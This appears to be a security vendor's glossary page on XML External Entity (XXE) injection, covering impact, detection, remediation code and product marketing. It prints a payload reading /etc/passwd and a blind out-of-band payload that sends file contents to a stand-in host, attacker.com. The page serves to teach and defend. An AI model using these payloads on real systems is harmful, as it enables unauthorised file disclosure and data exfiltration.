high CWE-611 A05:2021 Security Misconfiguration Detection: moderate

XML External Entity (XXE)

Name: Revaizor
Author: Revaizor

XML External Entity injection exploits misconfigured XML parsers to read local files, perform server-side request forgery, execute denial of service attacks, and in some cases achieve remote code execution.

web api code

Technical Description

XML External Entity (XXE) injection exploits features of the XML specification that allow documents to reference external resources through Document Type Definitions (DTDs). When an XML parser processes untrusted XML input with external entity resolution enabled (which is the default in many parsers), an attacker can define entities that reference local files, internal network resources, or external URLs.

The XML specification supports several entity types that can be abused:

External Entities: Reference files on the local file system or remote URLs.
Parameter Entities: Used within DTDs to define reusable components, enabling data exfiltration through out-of-band channels.
Recursive Entities (Billion Laughs): Entity definitions that reference each other exponentially, causing denial of service through memory exhaustion.

A basic XXE attack to read a local file:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>
  <data>&xxe;</data>
</root>

When the parser processes this document, it resolves &xxe; by reading /etc/passwd and inserting its contents into the <data> element. If the application returns the parsed XML data in its response, the file contents are disclosed to the attacker.

For blind XXE (where the response is not returned), attackers use out-of-band exfiltration via parameter entities:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY % file SYSTEM "file:///etc/hostname">
  <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">
  %dtd;
]>
<root>&send;</root>

<!-- evil.dtd on attacker's server: -->
<!-- <!ENTITY % combined "<!ENTITY send SYSTEM 'http://attacker.com/?data=%file;'>"> -->
<!-- %combined; -->

XXE is not limited to obvious XML endpoints. Vulnerable parsers are found in:

SOAP services
SVG image uploads
Office document processing (DOCX, XLSX are ZIP archives containing XML)
SAML authentication (XML-based)
RSS/Atom feed processors
Configuration file parsers
PDF generators that accept XML input

Real-World Impact

XXE vulnerabilities have been exploited in enterprise and government systems:

Facebook (2014): A researcher discovered an XXE vulnerability in Facebook’s career portal that could read arbitrary files from the server, earning a $30,000 bounty.
Uber (2016): XXE in Uber’s SAML authentication implementation allowed reading internal files and performing SSRF, enabling access to internal AWS metadata and infrastructure.
US Government (Multiple): NIST has documented numerous XXE vulnerabilities in government web services that process XML data, including SAML-based single sign-on implementations.

XXE combines file disclosure, SSRF, and denial of service into a single vulnerability class. In the worst case, XXE on a Java application using the expect:// wrapper or other protocol handlers can achieve remote code execution. Even without RCE, reading configuration files containing database credentials or API keys frequently enables complete infrastructure compromise.

Detection Methodology

XXE testing should be performed against any endpoint that processes XML:

XML Endpoint Identification: Identify every endpoint that accepts XML input, including SOAP services, REST APIs with Content-Type: application/xml, file upload handlers (SVG, DOCX, XLSX), and SAML endpoints.
Basic Entity Testing: Submit XML payloads containing external entity definitions referencing known files (/etc/passwd on Linux, C:\Windows\win.ini on Windows). Check if file contents appear in the response.
Blind XXE with OOB: When responses do not reflect entity values, use parameter entities to exfiltrate data through DNS lookups or HTTP requests to an attacker-controlled server.
Content-Type Manipulation: For endpoints that expect JSON, try changing the Content-Type to application/xml and submit XML. Some frameworks accept both formats and may process XML through a vulnerable parser.
Denial of Service Testing: Carefully test for entity expansion attacks (Billion Laughs) to verify parser limits. This should be done cautiously in production environments.
Document Format Testing: Upload SVG, DOCX, and XLSX files containing XXE payloads in their internal XML structures.

How Revaizor Discovers This

Revaizor’s AI agents systematically test for XXE across the full attack surface:

Comprehensive XML Surface Discovery: Revaizor identifies all XML processing endpoints, including non-obvious ones like file upload handlers that process SVG, DOCX, or XLSX files, SAML authentication flows, and API endpoints that accept XML even when documented as JSON-only.
Content-Type Fuzzing: Revaizor tests whether endpoints that expect non-XML formats (JSON, form data) will also process XML input. This discovers XXE in parsers that are silently active but not intended to be exposed.
Multi-Technique Exploitation: Revaizor tests both classic XXE (with response reflection) and blind XXE (using out-of-band exfiltration). It automatically escalates from file read to SSRF, testing internal network access and cloud metadata endpoints.
Document-Based XXE: Revaizor generates malicious SVG, DOCX, and XLSX documents with embedded XXE payloads and uploads them to file processing endpoints, testing a vector that many automated scanners overlook entirely.
Parser-Specific Payloads: Revaizor identifies the XML parser in use (libxml2, Xerces, MSXML, etc.) and crafts parser-specific payloads that account for known behavior differences, entity handling quirks, and protocol support variations.

Remediation

The primary defense is disabling external entity resolution in XML parsers:

# Python - defusedxml (recommended)
import defusedxml.ElementTree as ET
tree = ET.parse(xml_input)  # Safe - external entities disabled

# Python - standard library with explicit disabling
from xml.etree.ElementTree import XMLParser
import xml.etree.ElementTree as ET
# Note: xml.etree.ElementTree is NOT vulnerable to XXE by default in Python 3
# But lxml and other parsers require explicit configuration

// Java - disable external entities in DocumentBuilderFactory
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
dbf.setXIncludeAware(false);
dbf.setExpandEntityReferences(false);

// .NET - XmlReaderSettings
XmlReaderSettings settings = new XmlReaderSettings();
settings.DtdProcessing = DtdProcessing.Prohibit;
settings.XmlResolver = null;
XmlReader reader = XmlReader.Create(inputStream, settings);

Comprehensive XXE prevention:

Disable DTDs Entirely: The safest approach is to disable DTD processing completely (disallow-doctype-decl). This prevents all XXE variants including denial of service.
Use Safe Parsers: In Python, use defusedxml. In Java, use parsers configured with OWASP’s recommended settings. In .NET, set DtdProcessing.Prohibit.
Use Non-XML Formats: Where possible, use JSON or other data formats that do not have an equivalent to external entities. Migrate SOAP services to REST/JSON.
Input Validation: Reject XML input that contains <!DOCTYPE, <!ENTITY, or SYSTEM/PUBLIC keywords as an additional defense layer.
Web Application Firewall: Deploy WAF rules to detect and block XXE payloads in HTTP traffic, providing defense in depth.
SAML Library Updates: If using SAML for authentication, ensure the SAML library properly disables external entities in its XML parser. Many SAML XXE vulnerabilities stem from default-insecure parser configurations.

Related Glossary Terms

Burp Suite OWASP Top 10 Server-Side Request Forgery (SSRF)

XML External Entity (XXE)

Technical Description

Real-World Impact

Detection Methodology

How Revaizor Discovers This

Remediation

Related Glossary Terms

Related Comparisons

AI Pentesting vs Bug Bounty Programs

Autonomous Pentesting vs PTaaS Marketplaces

Continuous vs Annual Pentesting

Related Articles

AI Pentesting vs. Vulnerability Scanners: Understanding the Difference

Mission-Driven Security Testing: A New Paradigm

Ready to try autonomous pentesting?